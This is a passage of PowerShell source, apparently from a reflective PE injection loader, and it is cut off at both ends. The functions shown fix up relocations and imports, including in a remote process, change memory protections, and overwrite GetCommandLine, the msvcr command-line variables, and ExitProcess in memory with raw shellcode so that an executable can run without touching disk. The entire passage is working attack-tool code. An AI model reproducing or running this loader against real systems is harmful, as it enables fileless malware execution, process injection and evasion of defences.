Update-MemoryAddresses\n    {\n        Param(\n        [Parameter(Position = 0, Mandatory = $true)]\n        [System.Object]\n        $PEInfo,\n\n        [Parameter(Position = 1, Mandatory = $true)]\n        [Int64]\n        $OriginalImageBase,\n\n        [Parameter(Position = 2, Mandatory = $true)]\n        [System.Object]\n        $Win32Constants,\n\n        [Parameter(Position = 3, Mandatory = $true)]\n        [System.Object]\n        $Win32Types\n        )\n\n        [Int64]$BaseDifference = 0\n        $AddDifference = $true #Track if the difference variable should be added or subtracted from variables\n        [UInt32]$ImageBaseRelocSize = [System.Runtime.InteropServices.Marshal]::SizeOf([Type]$Win32Types.IMAGE_BASE_RELOCATION)\n\n        #If the PE was loaded to its expected address or there are no entries in the BaseRelocationTable, nothing to do\n        if (($OriginalImageBase -eq [Int64]$PEInfo.EffectivePEHandle) `\n                -or ($PEInfo.IMAGE_NT_HEADERS.OptionalHeader.BaseRelocationTable.Size -eq 0))\n        {\n            return\n        }\n\n\n        elseif ((Compare-Val1GreaterThanVal2AsUInt ($OriginalImageBase) ($PEInfo.EffectivePEHandle)) -eq $true)\n        {\n            $BaseDifference = Sub-SignedIntAsUnsigned ($OriginalImageBase) ($PEInfo.EffectivePEHandle)\n            $AddDifference = $false\n        }\n        elseif ((Compare-Val1GreaterThanVal2AsUInt ($PEInfo.EffectivePEHandle) ($OriginalImageBase)) -eq $true)\n        {\n            $BaseDifference = Sub-SignedIntAsUnsigned ($PEInfo.EffectivePEHandle) ($OriginalImageBase)\n        }\n\n        #Use the IMAGE_BASE_RELOCATION structure to find memory addresses which need to be modified\n        [IntPtr]$BaseRelocPtr = [IntPtr](Add-SignedIntAsUnsigned ([Int64]$PEInfo.PEHandle) ([Int64]$PEInfo.IMAGE_NT_HEADERS.OptionalHeader.BaseRelocationTable.VirtualAddress))\n        while($true)\n        {\n            #If SizeOfBlock == 0, we are done\n            $BaseRelocationTable = [System.Runtime.InteropServices.Marshal]::PtrToStructure($BaseRelocPtr, [Type]$Win32Types.IMAGE_BASE_RELOCATION)\n\n            if ($BaseRelocationTable.SizeOfBlock -eq 0)\n            {\n                break\n            }\n\n            [IntPtr]$MemAddrBase = [IntPtr](Add-SignedIntAsUnsigned ([Int64]$PEInfo.PEHandle) ([Int64]$BaseRelocationTable.VirtualAddress))\n            $NumRelocations = ($BaseRelocationTable.SizeOfBlock - $ImageBaseRelocSize) / 2\n\n            #Loop through each relocation\n            for($i = 0; $i -lt $NumRelocations; $i++)\n            {\n                #Get info for this relocation\n                $RelocationInfoPtr = [IntPtr](Add-SignedIntAsUnsigned ([IntPtr]$BaseRelocPtr) ([Int64]$ImageBaseRelocSize + (2 * $i)))\n                [UInt16]$RelocationInfo = [System.Runtime.InteropServices.Marshal]::PtrToStructure($RelocationInfoPtr, [Type][UInt16])\n\n                #First 4 bits is the relocation type, last 12 bits is the address offset from $MemAddrBase\n                [UInt16]$RelocOffset = $RelocationInfo -band 0x0FFF\n                [UInt16]$RelocType = $RelocationInfo -band 0xF000\n                for ($j = 0; $j -lt 12; $j++)\n                {\n                    $RelocType = [Math]::Floor($RelocType / 2)\n                }\n\n                #For DLL's there are two types of relocations used according to the following MSDN article. One for 64bit and one for 32bit.\n                #This appears to be true for EXE's as well.\n                #   Site: http://msdn.microsoft.com/en-us/magazine/cc301808.aspx\n                if (($RelocType -eq $Win32Constants.IMAGE_REL_BASED_HIGHLOW) `\n                        -or ($RelocType -eq $Win32Constants.IMAGE_REL_BASED_DIR64))\n                {\n                    #Get the current memory address and update it based off the difference between PE expected base address and actual base address\n                    [IntPtr]$FinalAddr = [IntPtr](Add-SignedIntAsUnsigned ([Int64]$MemAddrBase) ([Int64]$RelocOffset))\n                    [IntPtr]$CurrAddr = [System.Runtime.InteropServices.Marshal]::PtrToStructure($FinalAddr, [Type][IntPtr])\n\n                    if ($AddDifference -eq $true)\n                    {\n                        [IntPtr]$CurrAddr = [IntPtr](Add-SignedIntAsUnsigned ([Int64]$CurrAddr) ($BaseDifference))\n                    }\n                    else\n                    {\n                        [IntPtr]$CurrAddr = [IntPtr](Sub-SignedIntAsUnsigned ([Int64]$CurrAddr) ($BaseDifference))\n                    }\n\n                    [System.Runtime.InteropServices.Marshal]::StructureToPtr($CurrAddr, $FinalAddr, $false) | Out-Null\n                }\n                elseif ($RelocType -ne $Win32Constants.IMAGE_REL_BASED_ABSOLUTE)\n                {\n                    #IMAGE_REL_BASED_ABSOLUTE is just used for padding, we don't actually do anything with it\n                    Throw \"Unknown relocation found, relocation value: $RelocType, relocationinfo: $RelocationInfo\"\n                }\n            }\n\n            $BaseRelocPtr = [IntPtr](Add-SignedIntAsUnsigned ([Int64]$BaseRelocPtr) ([Int64]$BaseRelocationTable.SizeOfBlock))\n        }\n    }\n\n\n    Function Import-DllImports\n    {\n        Param(\n        [Parameter(Position = 0, Mandatory = $true)]\n        [System.Object]\n        $PEInfo,\n\n        [Parameter(Position = 1, Mandatory = $true)]\n        [System.Object]\n        $Win32Functions,\n\n        [Parameter(Position = 2, Mandatory = $true)]\n        [System.Object]\n        $Win32Types,\n\n        [Parameter(Position = 3, Mandatory = $true)]\n        [System.Object]\n        $Win32Constants,\n\n        [Parameter(Position = 4, Mandatory = $false)]\n        [IntPtr]\n        $RemoteProcHandle\n        )\n\n        $RemoteLoading = $false\n        if ($PEInfo.PEHandle -ne $PEInfo.EffectivePEHandle)\n        {\n            $RemoteLoading = $true\n        }\n\n        if ($PEInfo.IMAGE_NT_HEADERS.OptionalHeader.ImportTable.Size -gt 0)\n        {\n            [IntPtr]$ImportDescriptorPtr = Add-SignedIntAsUnsigned ([Int64]$PEInfo.PEHandle) ([Int64]$PEInfo.IMAGE_NT_HEADERS.OptionalHeader.ImportTable.VirtualAddress)\n\n            while ($true)\n            {\n                $ImportDescriptor = [System.Runtime.InteropServices.Marshal]::PtrToStructure($ImportDescriptorPtr, [Type]$Win32Types.IMAGE_IMPORT_DESCRIPTOR)\n\n                #If the structure is null, it signals that this is the end of the array\n                if ($ImportDescriptor.Characteristics -eq 0 `\n                        -and $ImportDescriptor.FirstThunk -eq 0 `\n                        -and $ImportDescriptor.ForwarderChain -eq 0 `\n                        -and $ImportDescriptor.Name -eq 0 `\n                        -and $ImportDescriptor.TimeDateStamp -eq 0)\n                {\n                    Write-Verbose \"Done importing DLL imports\"\n                    break\n                }\n\n                $ImportDllHandle = [IntPtr]::Zero\n                $ImportDllPathPtr = (Add-SignedIntAsUnsigned ([Int64]$PEInfo.PEHandle) ([Int64]$ImportDescriptor.Name))\n                $ImportDllPath = [System.Runtime.InteropServices.Marshal]::PtrToStringAnsi($ImportDllPathPtr)\n\n                if ($RemoteLoading -eq $true)\n                {\n                    $ImportDllHandle = Import-DllInRemoteProcess -RemoteProcHandle $RemoteProcHandle -ImportDllPathPtr $ImportDllPathPtr\n                }\n                else\n                {\n                    $ImportDllHandle = $Win32Functions.LoadLibrary.Invoke($ImportDllPath)\n                }\n\n                if (($ImportDllHandle -eq $null) -or ($ImportDllHandle -eq [IntPtr]::Zero))\n                {\n                    throw \"Error importing DLL, DLLName: $ImportDllPath\"\n                }\n\n                #Get the first thunk, then loop through all of them\n                [IntPtr]$ThunkRef = Add-SignedIntAsUnsigned ($PEInfo.PEHandle) ($ImportDescriptor.FirstThunk)\n                [IntPtr]$OriginalThunkRef = Add-SignedIntAsUnsigned ($PEInfo.PEHandle) ($ImportDescriptor.Characteristics) #Characteristics is overloaded with OriginalFirstThunk\n                [IntPtr]$OriginalThunkRefVal = [System.Runtime.InteropServices.Marshal]::PtrToStructure($OriginalThunkRef, [Type][IntPtr])\n\n                while ($OriginalThunkRefVal -ne [IntPtr]::Zero)\n                {\n                    $LoadByOrdinal = $false\n                    [IntPtr]$ProcedureNamePtr = [IntPtr]::Zero\n                    #Compare thunkRefVal to IMAGE_ORDINAL_FLAG, which is defined as 0x80000000 or 0x8000000000000000 depending on 32bit or 64bit\n                    #   If the top bit is set on an int, it will be negative, so instead of worrying about casting this to uint\n                    #   and doing the comparison, just see if it is less than 0\n                    [IntPtr]$NewThunkRef = [IntPtr]::Zero\n                    if([System.Runtime.InteropServices.Marshal]::SizeOf([Type][IntPtr]) -eq 4 -and [Int32]$OriginalThunkRefVal -lt 0)\n                    {\n                        [IntPtr]$ProcedureNamePtr = [IntPtr]$OriginalThunkRefVal -band 0xffff #This is actually a lookup by ordinal\n                        $LoadByOrdinal = $true\n                    }\n                    elseif([System.Runtime.InteropServices.Marshal]::SizeOf([Type][IntPtr]) -eq 8 -and [Int64]$OriginalThunkRefVal -lt 0)\n                    {\n                        [IntPtr]$ProcedureNamePtr = [Int64]$OriginalThunkRefVal -band 0xffff #This is actually a lookup by ordinal\n                        $LoadByOrdinal = $true\n                    }\n                    else\n                    {\n                        [IntPtr]$StringAddr = Add-SignedIntAsUnsigned ($PEInfo.PEHandle) ($OriginalThunkRefVal)\n                        $StringAddr = Add-SignedIntAsUnsigned $StringAddr ([System.Runtime.InteropServices.Marshal]::SizeOf([Type][UInt16]))\n                        $ProcedureName = [System.Runtime.InteropServices.Marshal]::PtrToStringAnsi($StringAddr)\n                        $ProcedureNamePtr = [System.Runtime.InteropServices.Marshal]::StringToHGlobalAnsi($ProcedureName)\n                    }\n\n                    if ($RemoteLoading -eq $true)\n                    {\n                        [IntPtr]$NewThunkRef = Get-RemoteProcAddress -RemoteProcHandle $RemoteProcHandle -RemoteDllHandle $ImportDllHandle -FunctionNamePtr $ProcedureNamePtr -LoadByOrdinal $LoadByOrdinal\n                    }\n                    else\n                    {\n                        [IntPtr]$NewThunkRef = $Win32Functions.GetProcAddressIntPtr.Invoke($ImportDllHandle, $ProcedureNamePtr)\n                    }\n\n                    if ($NewThunkRef -eq $null -or $NewThunkRef -eq [IntPtr]::Zero)\n                    {\n                        if ($LoadByOrdinal)\n                        {\n                            Throw \"New function reference is null, this is almost certainly a bug in this script. Function Ordinal: $ProcedureNamePtr. Dll: $ImportDllPath\"\n                        }\n                        else\n                        {\n                            Throw \"New function reference is null, this is almost certainly a bug in this script. Function: $ProcedureName. Dll: $ImportDllPath\"\n                        }\n                    }\n\n                    [System.Runtime.InteropServices.Marshal]::StructureToPtr($NewThunkRef, $ThunkRef, $false)\n\n                    $ThunkRef = Add-SignedIntAsUnsigned ([Int64]$ThunkRef) ([System.Runtime.InteropServices.Marshal]::SizeOf([Type][IntPtr]))\n                    [IntPtr]$OriginalThunkRef = Add-SignedIntAsUnsigned ([Int64]$OriginalThunkRef) ([System.Runtime.InteropServices.Marshal]::SizeOf([Type][IntPtr]))\n                    [IntPtr]$OriginalThunkRefVal = [System.Runtime.InteropServices.Marshal]::PtrToStructure($OriginalThunkRef, [Type][IntPtr])\n\n                    #Cleanup\n                    #If loading by ordinal, ProcedureNamePtr is the ordinal value and not actually a pointer to a buffer that needs to be freed\n                    if ((-not $LoadByOrdinal) -and ($ProcedureNamePtr -ne [IntPtr]::Zero))\n                    {\n                        [System.Runtime.InteropServices.Marshal]::FreeHGlobal($ProcedureNamePtr)\n                        $ProcedureNamePtr = [IntPtr]::Zero\n                    }\n                }\n\n                $ImportDescriptorPtr = Add-SignedIntAsUnsigned ($ImportDescriptorPtr) ([System.Runtime.InteropServices.Marshal]::SizeOf([Type]$Win32Types.IMAGE_IMPORT_DESCRIPTOR))\n            }\n        }\n    }\n\n    Function Get-VirtualProtectValue\n    {\n        Param(\n        [Parameter(Position = 0, Mandatory = $true)]\n        [UInt32]\n        $SectionCharacteristics\n        )\n\n        $ProtectionFlag = 0x0\n        if (($SectionCharacteristics -band $Win32Constants.IMAGE_SCN_MEM_EXECUTE) -gt 0)\n        {\n            if (($SectionCharacteristics -band $Win32Constants.IMAGE_SCN_MEM_READ) -gt 0)\n            {\n                if (($SectionCharacteristics -band $Win32Constants.IMAGE_SCN_MEM_WRITE) -gt 0)\n                {\n                    $ProtectionFlag = $Win32Constants.PAGE_EXECUTE_READWRITE\n                }\n                else\n                {\n                    $ProtectionFlag = $Win32Constants.PAGE_EXECUTE_READ\n                }\n            }\n            else\n            {\n                if (($SectionCharacteristics -band $Win32Constants.IMAGE_SCN_MEM_WRITE) -gt 0)\n                {\n                    $ProtectionFlag = $Win32Constants.PAGE_EXECUTE_WRITECOPY\n                }\n                else\n                {\n                    $ProtectionFlag = $Win32Constants.PAGE_EXECUTE\n                }\n            }\n        }\n        else\n        {\n            if (($SectionCharacteristics -band $Win32Constants.IMAGE_SCN_MEM_READ) -gt 0)\n            {\n                if (($SectionCharacteristics -band $Win32Constants.IMAGE_SCN_MEM_WRITE) -gt 0)\n                {\n                    $ProtectionFlag = $Win32Constants.PAGE_READWRITE\n                }\n                else\n                {\n                    $ProtectionFlag = $Win32Constants.PAGE_READONLY\n                }\n            }\n            else\n            {\n                if (($SectionCharacteristics -band $Win32Constants.IMAGE_SCN_MEM_WRITE) -gt 0)\n                {\n                    $ProtectionFlag = $Win32Constants.PAGE_WRITECOPY\n                }\n                else\n                {\n                    $ProtectionFlag = $Win32Constants.PAGE_NOACCESS\n                }\n            }\n        }\n\n        if (($SectionCharacteristics -band $Win32Constants.IMAGE_SCN_MEM_NOT_CACHED) -gt 0)\n        {\n            $ProtectionFlag = $ProtectionFlag -bor $Win32Constants.PAGE_NOCACHE\n        }\n\n        return $ProtectionFlag\n    }\n\n    Function Update-MemoryProtectionFlags\n    {\n        Param(\n        [Parameter(Position = 0, Mandatory = $true)]\n        [System.Object]\n        $PEInfo,\n\n        [Parameter(Position = 1, Mandatory = $true)]\n        [System.Object]\n        $Win32Functions,\n\n        [Parameter(Position = 2, Mandatory = $true)]\n        [System.Object]\n        $Win32Constants,\n\n        [Parameter(Position = 3, Mandatory = $true)]\n        [System.Object]\n        $Win32Types\n        )\n\n        for( $i = 0; $i -lt $PEInfo.IMAGE_NT_HEADERS.FileHeader.NumberOfSections; $i++)\n        {\n            [IntPtr]$SectionHeaderPtr = [IntPtr](Add-SignedIntAsUnsigned ([Int64]$PEInfo.SectionHeaderPtr) ($i * [System.Runtime.InteropServices.Marshal]::SizeOf([Type]$Win32Types.IMAGE_SECTION_HEADER)))\n            $SectionHeader = [System.Runtime.InteropServices.Marshal]::PtrToStructure($SectionHeaderPtr, [Type]$Win32Types.IMAGE_SECTION_HEADER)\n            [IntPtr]$SectionPtr = Add-SignedIntAsUnsigned ($PEInfo.PEHandle) ($SectionHeader.VirtualAddress)\n\n            [UInt32]$ProtectFlag = Get-VirtualProtectValue $SectionHeader.Characteristics\n            [UInt32]$SectionSize = $SectionHeader.VirtualSize\n\n            [UInt32]$OldProtectFlag = 0\n            Test-MemoryRangeValid -DebugString \"Update-MemoryProtectionFlags::VirtualProtect\" -PEInfo $PEInfo -StartAddress $SectionPtr -Size $SectionSize | Out-Null\n            $Success = $Win32Functions.VirtualProtect.Invoke($SectionPtr, $SectionSize, $ProtectFlag, [Ref]$OldProtectFlag)\n            if ($Success -eq $false)\n            {\n                Throw \"Unable to change memory protection\"\n            }\n        }\n    }\n\n    #This function overwrites GetCommandLine and ExitThread which are needed to reflectively load an EXE\n    #Returns an object with addresses to copies of the bytes that were overwritten (and the count)\n    Function Update-ExeFunctions\n    {\n        Param(\n        [Parameter(Position = 0, Mandatory = $true)]\n        [System.Object]\n        $PEInfo,\n\n        [Parameter(Position = 1, Mandatory = $true)]\n        [System.Object]\n        $Win32Functions,\n\n        [Parameter(Position = 2, Mandatory = $true)]\n        [System.Object]\n        $Win32Constants,\n\n        [Parameter(Position = 3, Mandatory = $true)]\n        [String]\n        $ExeArguments,\n\n        [Parameter(Position = 4, Mandatory = $true)]\n        [IntPtr]\n        $ExeDoneBytePtr\n        )\n\n        #This will be an array of arrays. The inner array will consist of: @($DestAddr, $SourceAddr, $ByteCount). This is used to return memory to its original state.\n        $ReturnArray = @()\n\n        $PtrSize = [System.Runtime.InteropServices.Marshal]::SizeOf([Type][IntPtr])\n        [UInt32]$OldProtectFlag = 0\n\n        [IntPtr]$Kernel32Handle = $Win32Functions.GetModuleHandle.Invoke(\"Kernel32.dll\")\n        if ($Kernel32Handle -eq [IntPtr]::Zero)\n        {\n            throw \"Kernel32 handle null\"\n        }\n\n        [IntPtr]$KernelBaseHandle = $Win32Functions.GetModuleHandle.Invoke(\"KernelBase.dll\")\n        if ($KernelBaseHandle -eq [IntPtr]::Zero)\n        {\n            throw \"KernelBase handle null\"\n        }\n\n        #################################################\n        #First overwrite the GetCommandLine() function. This is the function that is called by a new process to get the command line args used to start it.\n        #   We overwrite it with shellcode to return a pointer to the string ExeArguments, allowing us to pass the exe any args we want.\n        $CmdLineWArgsPtr = [System.Runtime.InteropServices.Marshal]::StringToHGlobalUni($ExeArguments)\n        $CmdLineAArgsPtr = [System.Runtime.InteropServices.Marshal]::StringToHGlobalAnsi($ExeArguments)\n\n        [IntPtr]$GetCommandLineAAddr = $Win32Functions.GetProcAddress.Invoke($KernelBaseHandle, \"GetCommandLineA\")\n        [IntPtr]$GetCommandLineWAddr = $Win32Functions.GetProcAddress.Invoke($KernelBaseHandle, \"GetCommandLineW\")\n\n        if ($GetCommandLineAAddr -eq [IntPtr]::Zero -or $GetCommandLineWAddr -eq [IntPtr]::Zero)\n        {\n            throw \"GetCommandLine ptr null. GetCommandLineA: $(Get-Hex $GetCommandLineAAddr). GetCommandLineW: $(Get-Hex $GetCommandLineWAddr)\"\n        }\n\n        #Prepare the shellcode\n        [Byte[]]$Shellcode1 = @()\n        if ($PtrSize -eq 8)\n        {\n            $Shellcode1 += 0x48 #64bit shellcode has the 0x48 before the 0xb8\n        }\n        $Shellcode1 += 0xb8\n\n        [Byte[]]$Shellcode2 = @(0xc3)\n        $TotalSize = $Shellcode1.Length + $PtrSize + $Shellcode2.Length\n\n        #Make copy of GetCommandLineA and GetCommandLineW\n        $GetCommandLineAOrigBytesPtr = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($TotalSize)\n        $GetCommandLineWOrigBytesPtr = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($TotalSize)\n        $Win32Functions.memcpy.Invoke($GetCommandLineAOrigBytesPtr, $GetCommandLineAAddr, [UInt64]$TotalSize) | Out-Null\n        $Win32Functions.memcpy.Invoke($GetCommandLineWOrigBytesPtr, $GetCommandLineWAddr, [UInt64]$TotalSize) | Out-Null\n        $ReturnArray += ,($GetCommandLineAAddr, $GetCommandLineAOrigBytesPtr, $TotalSize)\n        $ReturnArray += ,($GetCommandLineWAddr, $GetCommandLineWOrigBytesPtr, $TotalSize)\n\n        #Overwrite GetCommandLineA\n        [UInt32]$OldProtectFlag = 0\n        $Success = $Win32Functions.VirtualProtect.Invoke($GetCommandLineAAddr, [UInt32]$TotalSize, [UInt32]($Win32Constants.PAGE_EXECUTE_READWRITE), [Ref]$OldProtectFlag)\n        if ($Success = $false)\n        {\n            throw \"Call to VirtualProtect failed\"\n        }\n\n        $GetCommandLineAAddrTemp = $GetCommandLineAAddr\n        Write-BytesToMemory -Bytes $Shellcode1 -MemoryAddress $GetCommandLineAAddrTemp\n        $GetCommandLineAAddrTemp = Add-SignedIntAsUnsigned $GetCommandLineAAddrTemp ($Shellcode1.Length)\n        [System.Runtime.InteropServices.Marshal]::StructureToPtr($CmdLineAArgsPtr, $GetCommandLineAAddrTemp, $false)\n        $GetCommandLineAAddrTemp = Add-SignedIntAsUnsigned $GetCommandLineAAddrTemp $PtrSize\n        Write-BytesToMemory -Bytes $Shellcode2 -MemoryAddress $GetCommandLineAAddrTemp\n\n        $Win32Functions.VirtualProtect.Invoke($GetCommandLineAAddr, [UInt32]$TotalSize, [UInt32]$OldProtectFlag, [Ref]$OldProtectFlag) | Out-Null\n\n\n        #Overwrite GetCommandLineW\n        [UInt32]$OldProtectFlag = 0\n        $Success = $Win32Functions.VirtualProtect.Invoke($GetCommandLineWAddr, [UInt32]$TotalSize, [UInt32]($Win32Constants.PAGE_EXECUTE_READWRITE), [Ref]$OldProtectFlag)\n        if ($Success = $false)\n        {\n            throw \"Call to VirtualProtect failed\"\n        }\n\n        $GetCommandLineWAddrTemp = $GetCommandLineWAddr\n        Write-BytesToMemory -Bytes $Shellcode1 -MemoryAddress $GetCommandLineWAddrTemp\n        $GetCommandLineWAddrTemp = Add-SignedIntAsUnsigned $GetCommandLineWAddrTemp ($Shellcode1.Length)\n        [System.Runtime.InteropServices.Marshal]::StructureToPtr($CmdLineWArgsPtr, $GetCommandLineWAddrTemp, $false)\n        $GetCommandLineWAddrTemp = Add-SignedIntAsUnsigned $GetCommandLineWAddrTemp $PtrSize\n        Write-BytesToMemory -Bytes $Shellcode2 -MemoryAddress $GetCommandLineWAddrTemp\n\n        $Win32Functions.VirtualProtect.Invoke($GetCommandLineWAddr, [UInt32]$TotalSize, [UInt32]$OldProtectFlag, [Ref]$OldProtectFlag) | Out-Null\n        #################################################\n\n        #################################################\n        #For C++ stuff that is compiled with visual studio as \"multithreaded DLL\", the above method of overwriting GetCommandLine doesn't work.\n        #   I don't know why exactly.. But the msvcr DLL that a \"DLL compiled executable\" imports has an export called _acmdln and _wcmdln.\n        #   It appears to call GetCommandLine and store the result in this var. Then when you call __wgetcmdln it parses and returns the\n        #   argv and argc values stored in these variables. So the easy thing to do is just overwrite the variable since they are exported.\n        $DllList = @(\"msvcr70d.dll\", \"msvcr71d.dll\", \"msvcr80d.dll\", \"msvcr90d.dll\", \"msvcr100d.dll\", \"msvcr110d.dll\", \"msvcr70.dll\" `\n            , \"msvcr71.dll\", \"msvcr80.dll\", \"msvcr90.dll\", \"msvcr100.dll\", \"msvcr110.dll\")\n\n        foreach ($Dll in $DllList)\n        {\n            [IntPtr]$DllHandle = $Win32Functions.GetModuleHandle.Invoke($Dll)\n            if ($DllHandle -ne [IntPtr]::Zero)\n            {\n                [IntPtr]$WCmdLnAddr = $Win32Functions.GetProcAddress.Invoke($DllHandle, \"_wcmdln\")\n                [IntPtr]$ACmdLnAddr = $Win32Functions.GetProcAddress.Invoke($DllHandle, \"_acmdln\")\n                if ($WCmdLnAddr -eq [IntPtr]::Zero -or $ACmdLnAddr -eq [IntPtr]::Zero)\n                {\n                    \"Error, couldn't find _wcmdln or _acmdln\"\n                }\n\n                $NewACmdLnPtr = [System.Runtime.InteropServices.Marshal]::StringToHGlobalAnsi($ExeArguments)\n                $NewWCmdLnPtr = [System.Runtime.InteropServices.Marshal]::StringToHGlobalUni($ExeArguments)\n\n                #Make a copy of the original char* and wchar_t* so these variables can be returned back to their original state\n                $OrigACmdLnPtr = [System.Runtime.InteropServices.Marshal]::PtrToStructure($ACmdLnAddr, [Type][IntPtr])\n                $OrigWCmdLnPtr = [System.Runtime.InteropServices.Marshal]::PtrToStructure($WCmdLnAddr, [Type][IntPtr])\n                $OrigACmdLnPtrStorage = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($PtrSize)\n                $OrigWCmdLnPtrStorage = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($PtrSize)\n                [System.Runtime.InteropServices.Marshal]::StructureToPtr($OrigACmdLnPtr, $OrigACmdLnPtrStorage, $false)\n                [System.Runtime.InteropServices.Marshal]::StructureToPtr($OrigWCmdLnPtr, $OrigWCmdLnPtrStorage, $false)\n                $ReturnArray += ,($ACmdLnAddr, $OrigACmdLnPtrStorage, $PtrSize)\n                $ReturnArray += ,($WCmdLnAddr, $OrigWCmdLnPtrStorage, $PtrSize)\n\n                $Success = $Win32Functions.VirtualProtect.Invoke($ACmdLnAddr, [UInt32]$PtrSize, [UInt32]($Win32Constants.PAGE_EXECUTE_READWRITE), [Ref]$OldProtectFlag)\n                if ($Success = $false)\n                {\n                    throw \"Call to VirtualProtect failed\"\n                }\n                [System.Runtime.InteropServices.Marshal]::StructureToPtr($NewACmdLnPtr, $ACmdLnAddr, $false)\n                $Win32Functions.VirtualProtect.Invoke($ACmdLnAddr, [UInt32]$PtrSize, [UInt32]($OldProtectFlag), [Ref]$OldProtectFlag) | Out-Null\n\n                $Success = $Win32Functions.VirtualProtect.Invoke($WCmdLnAddr, [UInt32]$PtrSize, [UInt32]($Win32Constants.PAGE_EXECUTE_READWRITE), [Ref]$OldProtectFlag)\n                if ($Success = $false)\n                {\n                    throw \"Call to VirtualProtect failed\"\n                }\n                [System.Runtime.InteropServices.Marshal]::StructureToPtr($NewWCmdLnPtr, $WCmdLnAddr, $false)\n                $Win32Functions.VirtualProtect.Invoke($WCmdLnAddr, [UInt32]$PtrSize, [UInt32]($OldProtectFlag), [Ref]$OldProtectFlag) | Out-Null\n            }\n        }\n        #################################################\n\n        #################################################\n        #Next overwrite CorExitProcess and ExitProcess to instead ExitThread. This way the entire Powershell process doesn't die when the EXE exits.\n\n        $ReturnArray = @()\n        $ExitFunctions = @() #Array of functions to overwrite so the thread doesn't exit the process\n\n        #CorExitProcess (compiled in to visual studio c++)\n        [IntPtr]$MscoreeHandle = $Win32Functions.GetModuleHandle.Invoke(\"mscoree.dll\")\n        if ($MscoreeHandle -eq [IntPtr]::Zero)\n        {\n            throw \"mscoree handle null\"\n        }\n        [IntPtr]$CorExitProcessAddr = $Win32Functions.GetProcAddress.Invoke($MscoreeHandle, \"CorExitProcess\")\n        if ($CorExitProcessAddr -eq [IntPtr]::Zero)\n        {\n            Throw \"CorExitProcess address not found\"\n        }\n        $ExitFunctions += $CorExitProcessAddr\n\n        #ExitProcess (what non-managed programs use)\n        [IntPtr]$ExitProcessAddr = $Win32Functions.GetProcAddress.Invoke($Kernel32Handle, \"ExitProcess\")\n        if ($ExitProcessAddr -eq [IntPtr]::Zero)\n        {\n            Throw \"ExitProcess address not found\"\n        }\n        $ExitFunctions += $ExitProcessAddr\n\n        [UInt32]$OldProtectFlag = 0\n        foreach ($ProcExitFunctionAddr in $ExitFunctions)\n        {\n            $ProcExitFunctionAddrTmp = $ProcExitFunctionAddr\n            #The following is the shellcode (Shellcode: ExitThread.asm):\n            #32bit shellcode\n            [Byte[]]$Shellcode1 = @(0xbb)\n            [Byte[]]$Shellcode2 = @(0xc6, 0x03, 0x01, 0x83, 0xec, 0x20, 0x83, 0xe4, 0xc0, 0xbb)\n            #64bit shellcode (Shellcode: ExitThread.asm)\n            if ($PtrSize -eq 8)\n            {\n                [Byte[]]$Shellcode1 = @(0x48, 0xbb)\n                [Byte[]]$Shellcode2 = @(0xc6, 0x03, 0x01, 0x48, 0x83, 0xec, 0x20, 0x66, 0x83, 0xe4, 0xc0, 0x48, 0xbb)\n            }\n            [Byte[]]$Shellcode3 = @(0xff, 0xd3)\n            $TotalSize = $Shellcode1.Length + $PtrSize + $Shellcode2.Length + $PtrSize + $Shellcode3.Length\n\n            [IntPtr]$ExitThreadAddr = $Win32Functions.GetProcAddress.Invoke($Kernel32Handle, \"ExitThread\")\n            if ($ExitThreadAddr -eq [IntPtr]::Zero)\n            {\n                Throw \"ExitThread address not found\"\n            }\n\n            $Success = $Win32Functions.VirtualProtect.Invoke($ProcExitFunctionAddr, [UInt32]$TotalSize, [UInt32]$Win32Constants.PAGE_EXECUTE_READWRITE, [Ref]$OldProtectFlag)\n            if ($Success -eq $false)\n            {\n                Throw \"Call to VirtualProtect failed\"\n            }\n\n            #Make copy of original ExitProcess bytes\n            $ExitProcessOrigBytesPtr = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($TotalSize)\n            $Win32Functions.memcpy.Invoke($ExitProcessOrigBytesPtr, $ProcExitFunctionAddr, [UInt64]$TotalSize) | Out-Null\n            $ReturnArray += ,($ProcExitFunctionAddr, $ExitProcessOrigBytesPtr, $TotalSize)\n\n            #Write the ExitThread shellcode to memory. This shellcode will write 0x01 to ExeDoneBytePtr address (so PS knows the EXE is done), then\n            #   call ExitThread\n            Write-BytesToMemory -Bytes $Shellcode1 -MemoryAddress $ProcExitFunctionAddrTmp\n            $ProcExitFunctionAddrTmp = Add-SignedIntAsUnsigned $ProcExitFunctionAddrTmp ($Shellcode1.Length)\n            [System.Runtime.InteropServices.Marshal]::StructureToPtr($ExeDoneBytePtr, $ProcExitFunctionAddrTmp, $false)\n            $ProcExitFunctionAddrTmp = Add-SignedIntAsUnsigned $ProcExitFunctionAddrTmp $PtrSize\n            Write-BytesToMemory -Bytes $Shellcode2 -MemoryAddress $ProcExitFunctionAddrTmp\n            $ProcExitFunctionAddrTmp = Add-SignedIntAsUnsigned $ProcExitFunctionAddrTmp ($Shellcode2.Length)\n            [System.Runtime.InteropServices.Marshal]::StructureToPtr($ExitThreadAddr, $ProcExitFunctionAddrTmp, $false)\n            $ProcExitFunctionAddrTmp = Add-SignedIntAsUnsigned $ProcExitFunctionAddrTmp $PtrSize\n            Write-BytesToMemory -Bytes $Shellcode3 -MemoryAddress $ProcExitFunctionAddrTmp\n\n            $Win32Functions.VirtualProtect.Invoke($ProcExitFunctionAddr, [UInt32]$TotalSize, [UInt32]$OldProtectFlag, [Ref]$OldProtectFlag) | Out-Null\n        }\n        #################################################\n\n        Write-Output $ReturnArray\n    }\n\n    #This function takes an array of arrays, the inner array of format @($DestAddr, $SourceAddr, $Count)\n    #   It copies Count bytes from Source to Destination.\n    Function Copy-ArrayOfMemAddresses\n    {\n        Param(\n        [Parameter(Position = 0, Mandatory = $true)]\n        [Array[]]\n        $CopyInfo,\n\n        [Parameter(Position = 1, Mandatory = $true)]\n        [System.Object]\n        $Win32Functions,\n\n        [Parameter(Position = 2, Mandatory = $true)]\n        [System.Object]\n        $Win32Constants\n        )\n\n        [UInt32]$OldProtectFlag = 0\n        foreach ($Info in $CopyInfo)\n        {\n            $Success = $Win32Functions.VirtualProtect.Invoke($Info[0], [UInt32]$Info[2], [UInt32]$Win32Constants.PAGE_EXECUTE_READWRITE, [Ref]$OldProtectFlag)\n            if ($Success -eq $false)\n            {\n                Throw \"Call to VirtualProtect failed\"\n            }\n\n            